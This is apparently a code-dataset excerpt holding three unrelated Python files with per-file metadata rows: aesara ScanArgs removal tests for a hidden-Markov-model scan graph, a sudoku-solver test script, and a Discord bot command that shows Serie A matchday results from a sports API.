        Y_t = at.random.normal(mus_t[S_tm1], sigma_t, rng=rng, name="Y_t")
        return S_t, Y_t

    (S_rv, Y_rv), scan_updates = aesara.scan(
        fn=scan_fn,
        sequences=[mus_tt, sigmas_tt],
        non_sequences=[Gamma_rv, rng_tt],
        outputs_info=[{"initial": at.stack([S_0_rv, S_0_rv]), "taps": [-2, -1]}, {}],
        strict=True,
        name="scan_rv",
    )
    # Adding names should make output easier to read
    Y_rv.name = "Y_rv"
    # This `S_rv` outer-output is actually a `Subtensor` of the "real" output
    S_rv = S_rv.owner.inputs[0]
    S_rv.name = "S_rv"
    rng_updates = scan_updates[rng_tt]
    rng_updates.name = "rng_updates"
    mus_in = Y_rv.owner.inputs[1]
    mus_in.name = "mus_in"
    sigmas_in = Y_rv.owner.inputs[2]
    sigmas_in.name = "sigmas_in"
    scan_args = ScanArgs.from_node(Y_rv.owner)
    # The second tap of the first (and only) mit-sot input.
    test_v = scan_args.inner_in_mit_sot[0][1]
    field_info = scan_args.find_among_fields(test_v)
    assert field_info.name == "inner_in_mit_sot"
    assert field_info.index == 0
    assert field_info.inner_index == 1
    assert field_info.agg_index == 3
    # Removing an unrelated variable is a no-op ...
    rm_info = scan_args._remove_from_fields(at.ones(2))
    assert rm_info is None
    # ... while removing the tap reports exactly where it lived.
    rm_info = scan_args._remove_from_fields(test_v)
    assert rm_info.name == "inner_in_mit_sot"
    assert rm_info.index == 0
    assert rm_info.inner_index == 1
    assert rm_info.agg_index == 3
def test_ScanArgs_remove_inner_input():
    """Remove an inner-graph input (`sigmas[t]`), with and without dependents."""
    hmm_model_env = create_test_hmm()
    scan_args = hmm_model_env["scan_args"]
    hmm_model_env["scan_op"]
    Y_t = hmm_model_env["Y_t"]
    Y_rv = hmm_model_env["Y_rv"]
    sigmas_in = hmm_model_env["sigmas_in"]
    sigmas_t = hmm_model_env["sigmas_t"]
    Gamma_rv = hmm_model_env["Gamma_rv"]
    Gamma_in = hmm_model_env["Gamma_in"]
    hmm_model_env["S_rv"]
    S_in = hmm_model_env["S_in"]
    S_t = hmm_model_env["S_t"]
    rng_tt = hmm_model_env["rng_tt"]
    rng_in = hmm_model_env["rng_in"]
    rng_updates = hmm_model_env["rng_updates"]
    # Check `ScanArgs.remove_from_fields` by removing `sigmas[t]` (i.e. the
    # inner-graph input)
    scan_args_copy = copy(scan_args)
    test_v = sigmas_t
    rm_info = scan_args_copy.remove_from_fields(test_v, rm_dependents=False)
    removed_nodes, _ = zip(*rm_info)
    assert sigmas_t in removed_nodes
    assert sigmas_t not in scan_args_copy.inner_in_seqs
    # Without `rm_dependents`, downstream outputs survive.
    assert Y_t not in removed_nodes
    assert len(scan_args_copy.inner_out_nit_sot) == 1
    scan_args_copy = copy(scan_args)
    test_v = sigmas_t
    # This removal includes dependents
    rm_info = scan_args_copy.remove_from_fields(test_v, rm_dependents=True)
    removed_nodes, _ = zip(*rm_info)
    # `sigmas[t]` (i.e. inner-graph input) should be gone
    assert sigmas_t in removed_nodes
    assert sigmas_t not in scan_args_copy.inner_in_seqs
    # `Y_t` (i.e. inner-graph output) should be gone
    assert Y_t in removed_nodes
    assert len(scan_args_copy.inner_out_nit_sot) == 0
    # `Y_rv` (i.e. outer-graph output) should be gone
    assert Y_rv in removed_nodes
    assert Y_rv not in scan_args_copy.outer_outputs
    assert len(scan_args_copy.outer_out_nit_sot) == 0
    # `sigmas_in` (i.e. outer-graph input) should be gone
    assert sigmas_in in removed_nodes
    assert test_v not in scan_args_copy.inner_in_seqs
    # These shouldn't have been removed
    assert S_t in scan_args_copy.inner_out_sit_sot
    assert S_in in scan_args_copy.outer_out_sit_sot
    assert Gamma_in in scan_args_copy.inner_in_non_seqs
    assert Gamma_rv in scan_args_copy.outer_in_non_seqs
    assert rng_tt in scan_args_copy.outer_in_shared
    assert rng_in in scan_args_copy.inner_out_shared
    # BUG FIX: this previously checked the *original* `scan_args`, which is
    # trivially unaffected by the removal; check the mutated copy instead.
    assert rng_updates in scan_args_copy.outer_out_shared
    # The other `Y_rv`-related inputs currently aren't removed, even though
    # they're no longer needed.
    # TODO: Would be nice if we did this, too
    # assert len(scan_args_copy.outer_in_seqs) == 0
    # TODO: Would be nice if we did this, too
    # assert len(scan_args_copy.inner_in_seqs) == 0
    # We shouldn't be able to remove the removed node
    with pytest.raises(ValueError):
        rm_info = scan_args_copy.remove_from_fields(test_v, rm_dependents=True)
def test_ScanArgs_remove_outer_input():
    """Removing an outer-graph input (`sigmas`) also removes its dependents."""
    hmm_model_env = create_test_hmm()
    scan_args = hmm_model_env["scan_args"]
    hmm_model_env["scan_op"]
    Y_t = hmm_model_env["Y_t"]
    Y_rv = hmm_model_env["Y_rv"]
    sigmas_in = hmm_model_env["sigmas_in"]
    sigmas_t = hmm_model_env["sigmas_t"]
    Gamma_rv = hmm_model_env["Gamma_rv"]
    Gamma_in = hmm_model_env["Gamma_in"]
    hmm_model_env["S_rv"]
    S_in = hmm_model_env["S_in"]
    S_t = hmm_model_env["S_t"]
    rng_tt = hmm_model_env["rng_tt"]
    rng_in = hmm_model_env["rng_in"]
    rng_updates = hmm_model_env["rng_updates"]
    # Remove `sigmas` (i.e. the outer-input)
    scan_args_copy = copy(scan_args)
    test_v = sigmas_in
    rm_info = scan_args_copy.remove_from_fields(test_v, rm_dependents=True)
    removed_nodes, _ = zip(*rm_info)
    # `sigmas_in` (i.e. outer-graph input) should be gone
    assert scan_args.outer_in_seqs[-1] in removed_nodes
    assert test_v not in scan_args_copy.inner_in_seqs
    # `sigmas[t]` should be gone
    assert sigmas_t in removed_nodes
    assert sigmas_t not in scan_args_copy.inner_in_seqs
    # `Y_t` (i.e. inner-graph output) should be gone
    assert Y_t in removed_nodes
    assert len(scan_args_copy.inner_out_nit_sot) == 0
    # `Y_rv` (i.e. outer-graph output) should be gone
    assert Y_rv not in scan_args_copy.outer_outputs
    assert len(scan_args_copy.outer_out_nit_sot) == 0
    # The state chain and non-sequences are untouched.
    assert S_t in scan_args_copy.inner_out_sit_sot
    assert S_in in scan_args_copy.outer_out_sit_sot
    assert Gamma_in in scan_args_copy.inner_in_non_seqs
    assert Gamma_rv in scan_args_copy.outer_in_non_seqs
    assert rng_tt in scan_args_copy.outer_in_shared
    assert rng_in in scan_args_copy.inner_out_shared
    # BUG FIX: check the mutated copy, not the untouched original `scan_args`.
    assert rng_updates in scan_args_copy.outer_out_shared
def test_ScanArgs_remove_inner_output():
    """Removing an inner-graph output (`Y_t`) removes its outer-graph output too."""
    hmm_model_env = create_test_hmm()
    scan_args = hmm_model_env["scan_args"]
    hmm_model_env["scan_op"]
    Y_t = hmm_model_env["Y_t"]
    Y_rv = hmm_model_env["Y_rv"]
    hmm_model_env["sigmas_in"]
    hmm_model_env["sigmas_t"]
    Gamma_rv = hmm_model_env["Gamma_rv"]
    Gamma_in = hmm_model_env["Gamma_in"]
    hmm_model_env["S_rv"]
    S_in = hmm_model_env["S_in"]
    S_t = hmm_model_env["S_t"]
    rng_tt = hmm_model_env["rng_tt"]
    rng_in = hmm_model_env["rng_in"]
    rng_updates = hmm_model_env["rng_updates"]
    # Remove `Y_t` (i.e. the inner-output)
    scan_args_copy = copy(scan_args)
    test_v = Y_t
    rm_info = scan_args_copy.remove_from_fields(test_v, rm_dependents=True)
    removed_nodes, _ = zip(*rm_info)
    # `Y_t` (i.e. inner-graph output) should be gone
    assert Y_t in removed_nodes
    assert len(scan_args_copy.inner_out_nit_sot) == 0
    # `Y_rv` (i.e. outer-graph output) should be gone
    assert Y_rv not in scan_args_copy.outer_outputs
    assert len(scan_args_copy.outer_out_nit_sot) == 0
    # The state chain and non-sequences are untouched.
    assert S_t in scan_args_copy.inner_out_sit_sot
    assert S_in in scan_args_copy.outer_out_sit_sot
    assert Gamma_in in scan_args_copy.inner_in_non_seqs
    assert Gamma_rv in scan_args_copy.outer_in_non_seqs
    assert rng_tt in scan_args_copy.outer_in_shared
    assert rng_in in scan_args_copy.inner_out_shared
    # BUG FIX: check the mutated copy, not the untouched original `scan_args`.
    assert rng_updates in scan_args_copy.outer_out_shared
def test_ScanArgs_remove_outer_output():
    """Removing an outer-graph output (`Y_rv`) removes its inner-graph source too."""
    hmm_model_env = create_test_hmm()
    scan_args = hmm_model_env["scan_args"]
    hmm_model_env["scan_op"]
    Y_t = hmm_model_env["Y_t"]
    Y_rv = hmm_model_env["Y_rv"]
    hmm_model_env["sigmas_in"]
    hmm_model_env["sigmas_t"]
    Gamma_rv = hmm_model_env["Gamma_rv"]
    Gamma_in = hmm_model_env["Gamma_in"]
    S_in = hmm_model_env["S_in"]
    S_t = hmm_model_env["S_t"]
    rng_tt = hmm_model_env["rng_tt"]
    rng_in = hmm_model_env["rng_in"]
    rng_updates = hmm_model_env["rng_updates"]
    # Remove `Y_rv` (i.e. a nit-sot outer-output)
    scan_args_copy = copy(scan_args)
    test_v = Y_rv
    rm_info = scan_args_copy.remove_from_fields(test_v, rm_dependents=True)
    removed_nodes, _ = zip(*rm_info)
    # `Y_t` (i.e. inner-graph output) should be gone
    assert Y_t in removed_nodes
    assert len(scan_args_copy.inner_out_nit_sot) == 0
    # `Y_rv` (i.e. outer-graph output) should be gone
    assert Y_rv not in scan_args_copy.outer_outputs
    assert len(scan_args_copy.outer_out_nit_sot) == 0
    # The state chain and non-sequences are untouched.
    assert S_t in scan_args_copy.inner_out_sit_sot
    assert S_in in scan_args_copy.outer_out_sit_sot
    assert Gamma_in in scan_args_copy.inner_in_non_seqs
    assert Gamma_rv in scan_args_copy.outer_in_non_seqs
    assert rng_tt in scan_args_copy.outer_in_shared
    assert rng_in in scan_args_copy.inner_out_shared
    # BUG FIX: check the mutated copy, not the untouched original `scan_args`.
    assert rng_updates in scan_args_copy.outer_out_shared
def test_ScanArgs_remove_nonseq_outer_input():
    """Removing a non-sequence outer-input (`Gamma`) removes the whole state chain."""
    hmm_model_env = create_test_hmm()
    scan_args = hmm_model_env["scan_args"]
    hmm_model_env["scan_op"]
    Y_t = hmm_model_env["Y_t"]
    Y_rv = hmm_model_env["Y_rv"]
    mus_in = hmm_model_env["mus_in"]
    mus_t = hmm_model_env["mus_t"]
    sigmas_in = hmm_model_env["sigmas_in"]
    sigmas_t = hmm_model_env["sigmas_t"]
    Gamma_rv = hmm_model_env["Gamma_rv"]
    Gamma_in = hmm_model_env["Gamma_in"]
    S_in = hmm_model_env["S_in"]
    S_t = hmm_model_env["S_t"]
    rng_tt = hmm_model_env["rng_tt"]
    rng_in = hmm_model_env["rng_in"]
    rng_updates = hmm_model_env["rng_updates"]
    # Remove `Gamma` (i.e. a non-sequence outer-input)
    scan_args_copy = copy(scan_args)
    test_v = Gamma_rv
    rm_info = scan_args_copy.remove_from_fields(test_v, rm_dependents=True)
    removed_nodes, _ = zip(*rm_info)
    # Everything downstream of `Gamma` — the state chain and the emissions —
    # goes with it.
    assert Gamma_rv in removed_nodes
    assert Gamma_in in removed_nodes
    assert S_in in removed_nodes
    assert S_t in removed_nodes
    assert Y_t in removed_nodes
    assert Y_rv in removed_nodes
    # The sequences and the shared RNG survive.
    assert mus_in in scan_args_copy.outer_in_seqs
    assert sigmas_in in scan_args_copy.outer_in_seqs
    assert mus_t in scan_args_copy.inner_in_seqs
    assert sigmas_t in scan_args_copy.inner_in_seqs
    assert rng_tt in scan_args_copy.outer_in_shared
    assert rng_in in scan_args_copy.inner_out_shared
    # BUG FIX: check the mutated copy, not the untouched original `scan_args`.
    assert rng_updates in scan_args_copy.outer_out_shared
def test_ScanArgs_remove_nonseq_inner_input():
    """Removing a non-sequence inner-input (`Gamma_in`) removes the state chain."""
    hmm_model_env = create_test_hmm()
    scan_args = hmm_model_env["scan_args"]
    hmm_model_env["scan_op"]
    hmm_model_env["Y_t"]
    hmm_model_env["Y_rv"]
    mus_in = hmm_model_env["mus_in"]
    mus_t = hmm_model_env["mus_t"]
    sigmas_in = hmm_model_env["sigmas_in"]
    sigmas_t = hmm_model_env["sigmas_t"]
    Gamma_rv = hmm_model_env["Gamma_rv"]
    Gamma_in = hmm_model_env["Gamma_in"]
    S_in = hmm_model_env["S_in"]
    S_t = hmm_model_env["S_t"]
    rng_tt = hmm_model_env["rng_tt"]
    rng_in = hmm_model_env["rng_in"]
    rng_updates = hmm_model_env["rng_updates"]
    # Remove `Gamma` (i.e. a non-sequence inner-input)
    scan_args_copy = copy(scan_args)
    test_v = Gamma_in
    rm_info = scan_args_copy.remove_from_fields(test_v, rm_dependents=True)
    removed_nodes, _ = zip(*rm_info)
    # Both sides of the non-sequence pair and the dependent state chain go.
    assert Gamma_in in removed_nodes
    assert Gamma_rv in removed_nodes
    assert S_in in removed_nodes
    assert S_t in removed_nodes
    # The sequences and the shared RNG survive.
    assert mus_in in scan_args_copy.outer_in_seqs
    assert sigmas_in in scan_args_copy.outer_in_seqs
    assert mus_t in scan_args_copy.inner_in_seqs
    assert sigmas_t in scan_args_copy.inner_in_seqs
    assert rng_tt in scan_args_copy.outer_in_shared
    assert rng_in in scan_args_copy.inner_out_shared
    # BUG FIX: check the mutated copy, not the untouched original `scan_args`.
    assert rng_updates in scan_args_copy.outer_out_shared
def test_ScanArgs_remove_shared_inner_output():
    """Removing the shared RNG inner-output takes every RNG-dependent output with it."""
    hmm_model_env = create_test_hmm()
    scan_args = hmm_model_env["scan_args"]
    hmm_model_env["scan_op"]
    hmm_model_env["Y_t"]
    Y_rv = hmm_model_env["Y_rv"]
    mus_in = hmm_model_env["mus_in"]
    mus_t = hmm_model_env["mus_t"]
    sigmas_in = hmm_model_env["sigmas_in"]
    sigmas_t = hmm_model_env["sigmas_t"]
    hmm_model_env["Gamma_rv"]
    hmm_model_env["Gamma_in"]
    S_in = hmm_model_env["S_in"]
    hmm_model_env["S_t"]
    rng_tt = hmm_model_env["rng_tt"]
    rng_in = hmm_model_env["rng_in"]
    rng_updates = hmm_model_env["rng_updates"]
    # Remove `rng` (i.e. a shared inner-output)
    scan_args_copy = copy(scan_args)
    test_v = rng_updates
    rm_info = scan_args_copy.remove_from_fields(test_v, rm_dependents=True)
    removed_nodes, _ = zip(*rm_info)
    # The RNG and every random output that depends on it are removed.
    assert rng_tt in removed_nodes
    assert rng_in in removed_nodes
    assert rng_updates in removed_nodes
    assert Y_rv in removed_nodes
    assert S_in in removed_nodes
    # The deterministic sequences survive.
    assert sigmas_in in scan_args_copy.outer_in_seqs
    assert sigmas_t in scan_args_copy.inner_in_seqs
    assert mus_in in scan_args_copy.outer_in_seqs
    assert mus_t in scan_args_copy.inner_in_seqs
| 34.693309
| 86
| 0.713957
| 3,298
| 18,665
| 3.61977
| 0.069739
| 0.10186
| 0.101357
| 0.057464
| 0.83297
| 0.803401
| 0.779695
| 0.756492
| 0.747613
| 0.747613
| 0
| 0.006933
| 0.188588
| 18,665
| 537
| 87
| 34.757914
| 0.781314
| 0.108492
| 0
| 0.727735
| 0
| 0
| 0.056824
| 0
| 0
| 0
| 0
| 0.001862
| 0.307888
| 1
| 0.033079
| false
| 0
| 0.015267
| 0
| 0.05598
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4ff27f69b89670b2baefce25a36fcbf63e0d1175
| 1,408
|
py
|
Python
|
tests.py
|
AmandaGouveia/SudokuSolver
|
e748d8d50c8515c28682485f6c485353fdbf4863
|
[
"MIT"
] | null | null | null |
tests.py
|
AmandaGouveia/SudokuSolver
|
e748d8d50c8515c28682485f6c485353fdbf4863
|
[
"MIT"
] | null | null | null |
tests.py
|
AmandaGouveia/SudokuSolver
|
e748d8d50c8515c28682485f6c485353fdbf4863
|
[
"MIT"
] | null | null | null |
import app
# An unsolved 9x9 Sudoku grid; 0 marks an empty cell.
puzzle = [
    [5, 3, 1, 0, 0, 0, 0, 0, 0],
    [0, 0, 0, 0, 0, 0, 8, 0, 0],
    [0, 2, 7, 1, 3, 0, 0, 0, 0],
    [0, 9, 0, 3, 2, 8, 0, 5, 0],
    [0, 1, 0, 4, 0, 0, 0, 0, 6],
    [0, 0, 0, 0, 0, 0, 0, 0, 4],
    [0, 6, 0, 0, 0, 0, 0, 0, 0],
    [0, 0, 5, 0, 0, 4, 0, 6, 0],
    [3, 0, 0, 0, 0, 0, 9, 0, 0]
]
# A list of fully-solved boards (here just one: the expected solution of
# `puzzle`).  Not referenced below — presumably kept as a manual check
# fixture; confirm before deleting.
correct = [
    [
        [5, 3, 1, 8, 4, 9, 6, 7, 2],
        [6, 4, 9, 5, 7, 2, 8, 3, 1],
        [8, 2, 7, 1, 3, 6, 5, 4, 9],
        [4, 9, 6, 3, 2, 8, 1, 5, 7],
        [2, 1, 8, 4, 5, 7, 3, 9, 6],
        [7, 5, 3, 9, 6, 1, 2, 8, 4],
        [9, 6, 2, 7, 8, 3, 4, 1, 5],
        [1, 8, 5, 2, 9, 4, 7, 6, 3],
        [3, 7, 4, 6, 1, 5, 9, 2, 8]
    ]
]
# Invalid boards: the first has a duplicated 8 in the last row/first column
# region, the second still contains a 0 (incomplete).  Also unused below.
incorrect = [
    [
        [5, 3, 1, 8, 4, 9, 6, 7, 2],
        [6, 4, 9, 5, 7, 2, 8, 3, 1],
        [8, 2, 7, 1, 3, 6, 5, 4, 9],
        [4, 9, 6, 3, 2, 8, 1, 5, 7],
        [2, 1, 8, 4, 5, 7, 3, 9, 6],
        [7, 5, 3, 9, 6, 1, 2, 8, 4],
        [9, 6, 2, 7, 8, 3, 4, 1, 5],
        [1, 8, 5, 2, 9, 4, 7, 6, 3],
        [8, 7, 4, 6, 1, 5, 9, 2, 8]
    ],
    [
        [5, 3, 1, 8, 4, 9, 6, 7, 2],
        [6, 4, 9, 5, 7, 2, 8, 3, 1],
        [8, 2, 7, 1, 3, 6, 5, 4, 9],
        [4, 9, 6, 3, 2, 8, 1, 5, 7],
        [2, 1, 8, 4, 5, 7, 3, 9, 6],
        [7, 5, 3, 9, 6, 1, 2, 8, 4],
        [9, 6, 2, 7, 8, 3, 4, 1, 5],
        [1, 8, 5, 2, 9, 4, 7, 6, 3],
        [0, 7, 4, 6, 1, 5, 9, 2, 8]
    ]
]
# Solve and print the result; `app.solve` presumably returns the completed
# grid (or a falsy value on failure) — confirm against `app.py`.
print(app.solve(puzzle))
| 25.6
| 36
| 0.265625
| 333
| 1,408
| 1.123123
| 0.051051
| 0.224599
| 0.256684
| 0.26738
| 0.791444
| 0.791444
| 0.772727
| 0.772727
| 0.665775
| 0.663102
| 0
| 0.41169
| 0.441051
| 1,408
| 54
| 37
| 26.074074
| 0.063532
| 0
| 0
| 0.48
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.02
| 0
| 0.02
| 0.02
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
8c92cadb4ac1c3337d2b67401a9eac17bc429021
| 9,305
|
py
|
Python
|
commands/results/matches.py
|
PyGera/fantacalcio-bot
|
bf9f8aba45d8c21b22255267764077d443e3ee10
|
[
"MIT"
] | 2
|
2021-10-08T23:14:23.000Z
|
2021-11-01T15:34:21.000Z
|
commands/results/matches.py
|
PyGera/fantacalcio-bot
|
bf9f8aba45d8c21b22255267764077d443e3ee10
|
[
"MIT"
] | 1
|
2021-10-17T00:16:06.000Z
|
2021-10-17T00:16:06.000Z
|
commands/results/matches.py
|
PyGera/fantacalcio-bot
|
bf9f8aba45d8c21b22255267764077d443e3ee10
|
[
"MIT"
] | null | null | null |
import discord
import datetime
import requests
async def matches_function(ctx, client, FOOTBALL_API_HEADERS):
    '''
    Matches command:
    Getting live data about the current Serie A TIM matchday

    Builds a Discord embed with one field per match of the current round and
    adds back/forward/refresh reactions so the message acts as a menu.
    '''
    my_round = {}
    # NOTE(review): season_id 2100 is hard-coded — presumably the current
    # Serie A season in the sportdataapi catalogue; confirm on season change.
    params = (
        ("season_id","2100"),
    )
    # Requesting to the API all the data about the matches
    matches_req = requests.get('https://app.sportdataapi.com/api/v1/soccer/matches', headers=FOOTBALL_API_HEADERS, params=params).json()
    matches = []
    # Getting the current matchday
    for match in matches_req['data']:
        if match['round']['is_current']:
            my_round = {'name': match['round']['name'], 'id': match['round']['round_id']}
            matches.append(match)
    # Sorting the matches by time
    matches.sort(key=lambda match: datetime.datetime.strptime(match['match_start'], '%Y-%m-%d %H:%M:%S'))
    # Message formatting
    embedVar = discord.Embed(
        title=f'{my_round["name"]}a Giornata di Serie A TIM',
        color=0x00197d
    )
    embedVar.set_thumbnail(url="https://www.legaseriea.it/assets/legaseriea/images/logo_main_seriea.png?v=34")
    for match in matches:
        # Field name: kickoff time shifted by +2h (assumed API times are UTC and
        # the audience is CET/CEST — confirm), or LIVE minute / first half /
        # finished depending on status_code (0, 1, 11, other — assumed mapping).
        # Field value: team emoji + names, with the winner bolded (**) once
        # status_code == 3 (finished).
        embedVar.add_field(name=f"{(datetime.datetime.strptime(match['match_start'], '%Y-%m-%d %H:%M:%S') + datetime.timedelta(hours=2)).strftime('%H:%M %d/%m/%Y') if match['status_code'] == 0 else f''':red_circle: LIVE {match['minute']}' ''' if match['status_code'] == 1 else ':clock10: Primo Tempo' if match['status_code'] == 11 else 'Partita Terminata'}", value=f"{str(discord.utils.get(client.emojis, name=match['home_team']['short_code']))} {'**'if match['stats']['home_score'] > match['stats']['away_score'] and match['status_code'] == 3 else ' '}{match['home_team']['name']} {f'''{match['stats']['home_score']} {'**'if match['stats']['home_score'] > match['stats']['away_score'] and match['status_code'] == 3 else ' '} - {'**'if match['stats']['home_score'] < match['stats']['away_score'] and match['status_code'] == 3 else ' '}{match['stats']['away_score']}''' if match['status_code'] != 0 else ' - '} {match['away_team']['name']}{'**' if match['stats']['home_score'] < match['stats']['away_score'] and match['status_code'] == 3 else ' '} {str(discord.utils.get(client.emojis, name=match['away_team']['short_code']))}", inline=False)
    # Send everything
    message = await ctx.reply(embed=embedVar, mention_author=False)
    emojis = ["⬅️", "➡️","🔄"]
    # React to create the matches menu
    for emoji in emojis:
        await message.add_reaction(emoji)
async def match_back(message, client, FOOTBALL_API_HEADERS):
    """Edit the matches embed to show the *previous* round (current round - 1).

    Re-fetches the season's matches, picks the round whose name is one less
    than the current round's, and rebuilds the embed in place.  Adds only the
    "back to now" reaction afterwards.
    """
    my_round = {}
    params = (
        ("season_id","2100"),
    )
    matches_req = requests.get('https://app.sportdataapi.com/api/v1/soccer/matches', headers=FOOTBALL_API_HEADERS, params=params).json()
    matches = []
    # First pass: derive the previous round's name from the current round.
    # NOTE(review): round names are assumed to be numeric strings; on round 1
    # this yields "0", which matches nothing below — confirm intended behavior.
    for match in matches_req['data']:
        if match['round']['is_current']:
            my_round = {'name': str(int(match['round']['name'])-1), 'id': match['round']['round_id']}
    # Second pass: collect that round's matches.
    for match in matches_req['data']:
        if match['round']['name'] == my_round['name']:
            matches.append(match)
    matches.sort(key=lambda match: datetime.datetime.strptime(match['match_start'], '%Y-%m-%d %H:%M:%S'))
    embedVar = discord.Embed(
        title=f'{my_round["name"]}a Giornata di Serie A TIM',
        color=0x00197d
    )
    embedVar.set_thumbnail(url="https://www.legaseriea.it/assets/legaseriea/images/logo_main_seriea.png?v=34")
    for match in matches:
        # Same field formatting as `matches_function`: time/LIVE/half/finished
        # header plus bolded winner in the score line (status_code mapping
        # assumed: 0 scheduled, 1 live, 11 first half, 3 finished).
        embedVar.add_field(name=f"{(datetime.datetime.strptime(match['match_start'], '%Y-%m-%d %H:%M:%S') + datetime.timedelta(hours=2)).strftime('%H:%M %d/%m/%Y') if match['status_code'] == 0 else f''':red_circle: LIVE {match['minute']}' ''' if match['status_code'] == 1 else ':clock10: Primo Tempo' if match['status_code'] == 11 else 'Partita Terminata'}", value=f"{str(discord.utils.get(client.emojis, name=match['home_team']['short_code']))} {'**'if match['stats']['home_score'] > match['stats']['away_score'] and match['status_code'] == 3 else ' '}{match['home_team']['name']} {f'''{match['stats']['home_score']} {'**'if match['stats']['home_score'] > match['stats']['away_score'] and match['status_code'] == 3 else ' '} - {'**'if match['stats']['home_score'] < match['stats']['away_score'] and match['status_code'] == 3 else ' '}{match['stats']['away_score']}''' if match['status_code'] != 0 else ' - '} {match['away_team']['name']}{'**' if match['stats']['home_score'] < match['stats']['away_score'] and match['status_code'] == 3 else ' '} {str(discord.utils.get(client.emojis, name=match['away_team']['short_code']))}", inline=False)
    await message.edit(embed=embedVar, mention_author=False)
    emojis = ["🕙"]
    for emoji in emojis:
        await message.add_reaction(emoji)
async def match_forward(message, client, FOOTBALL_API_HEADERS):
    """Edit the matches embed to show the *next* round (current round + 1).

    Mirror image of `match_back`: re-fetches the season's matches, selects the
    round named current+1, and rebuilds the embed in place.
    """
    my_round = {}
    params = (
        ("season_id","2100"),
    )
    matches_req = requests.get('https://app.sportdataapi.com/api/v1/soccer/matches', headers=FOOTBALL_API_HEADERS, params=params).json()
    matches = []
    # Derive the next round's name from the current round (numeric-string
    # round names assumed; past the final round this matches nothing).
    for match in matches_req['data']:
        if match['round']['is_current']:
            my_round = {'name': str(int(match['round']['name'])+1), 'id': match['round']['round_id']}
    for match in matches_req['data']:
        if match['round']['name'] == my_round['name']:
            matches.append(match)
    matches.sort(key=lambda match: datetime.datetime.strptime(match['match_start'], '%Y-%m-%d %H:%M:%S'))
    embedVar = discord.Embed(
        title=f'{my_round["name"]}a Giornata di Serie A TIM',
        color=0x00197d
    )
    embedVar.set_thumbnail(url="https://www.legaseriea.it/assets/legaseriea/images/logo_main_seriea.png?v=34")
    for match in matches:
        # Same per-match field formatting as `matches_function` (see there for
        # the assumed status_code mapping).
        embedVar.add_field(name=f"{(datetime.datetime.strptime(match['match_start'], '%Y-%m-%d %H:%M:%S') + datetime.timedelta(hours=2)).strftime('%H:%M %d/%m/%Y') if match['status_code'] == 0 else f''':red_circle: LIVE {match['minute']}' ''' if match['status_code'] == 1 else ':clock10: Primo Tempo' if match['status_code'] == 11 else 'Partita Terminata'}", value=f"{str(discord.utils.get(client.emojis, name=match['home_team']['short_code']))} {'**'if match['stats']['home_score'] > match['stats']['away_score'] and match['status_code'] == 3 else ' '}{match['home_team']['name']} {f'''{match['stats']['home_score']} {'**'if match['stats']['home_score'] > match['stats']['away_score'] and match['status_code'] == 3 else ' '} - {'**'if match['stats']['home_score'] < match['stats']['away_score'] and match['status_code'] == 3 else ' '}{match['stats']['away_score']}''' if match['status_code'] != 0 else ' - '} {match['away_team']['name']}{'**' if match['stats']['home_score'] < match['stats']['away_score'] and match['status_code'] == 3 else ' '} {str(discord.utils.get(client.emojis, name=match['away_team']['short_code']))}", inline=False)
    await message.edit(embed=embedVar, mention_author=False)
    emojis = ["🕙"]
    for emoji in emojis:
        await message.add_reaction(emoji)
async def match_now(message, client, FOOTBALL_API_HEADERS):
    """Edit the matches embed back to the *current* round.

    Used by the clock reaction to return from a back/forward view; restores
    the back/forward/refresh reaction menu.
    """
    my_round = {}
    params = (
        ("season_id","2100"),
    )
    matches_req = requests.get('https://app.sportdataapi.com/api/v1/soccer/matches', headers=FOOTBALL_API_HEADERS, params=params).json()
    matches = []
    # Single pass: the current round's matches are collected directly.
    for match in matches_req['data']:
        if match['round']['is_current']:
            my_round = {'name': str(match['round']['name']), 'id': match['round']['round_id']}
            matches.append(match)
    matches.sort(key=lambda match: datetime.datetime.strptime(match['match_start'], '%Y-%m-%d %H:%M:%S'))
    embedVar = discord.Embed(
        title=f'{my_round["name"]}a Giornata di Serie A TIM',
        color=0x00197d
    )
    embedVar.set_thumbnail(url="https://www.legaseriea.it/assets/legaseriea/images/logo_main_seriea.png?v=34")
    for match in matches:
        # Same per-match field formatting as `matches_function` (see there for
        # the assumed status_code mapping).
        embedVar.add_field(name=f"{(datetime.datetime.strptime(match['match_start'], '%Y-%m-%d %H:%M:%S') + datetime.timedelta(hours=2)).strftime('%H:%M %d/%m/%Y') if match['status_code'] == 0 else f''':red_circle: LIVE {match['minute']}' ''' if match['status_code'] == 1 else ':clock10: Primo Tempo' if match['status_code'] == 11 else 'Partita Terminata'}", value=f"{str(discord.utils.get(client.emojis, name=match['home_team']['short_code']))} {'**'if match['stats']['home_score'] > match['stats']['away_score'] and match['status_code'] == 3 else ' '}{match['home_team']['name']} {f'''{match['stats']['home_score']} {'**'if match['stats']['home_score'] > match['stats']['away_score'] and match['status_code'] == 3 else ' '} - {'**'if match['stats']['home_score'] < match['stats']['away_score'] and match['status_code'] == 3 else ' '}{match['stats']['away_score']}''' if match['status_code'] != 0 else ' - '} {match['away_team']['name']}{'**' if match['stats']['home_score'] < match['stats']['away_score'] and match['status_code'] == 3 else ' '} {str(discord.utils.get(client.emojis, name=match['away_team']['short_code']))}", inline=False)
    await message.edit(embed=embedVar, mention_author=False)
    emojis = ["⬅️", "➡️","🔄"]
    for emoji in emojis:
        await message.add_reaction(emoji)
| 56.737805
| 1,141
| 0.633423
| 1,285
| 9,305
| 4.449805
| 0.108949
| 0.069955
| 0.083945
| 0.066457
| 0.941413
| 0.941413
| 0.937041
| 0.937041
| 0.937041
| 0.921126
| 0
| 0.012931
| 0.152284
| 9,305
| 163
| 1,142
| 57.08589
| 0.710446
| 0.019022
| 0
| 0.79798
| 0
| 0.121212
| 0.597872
| 0.268233
| 0
| 0
| 0.003547
| 0
| 0
| 1
| 0
| false
| 0
| 0.030303
| 0
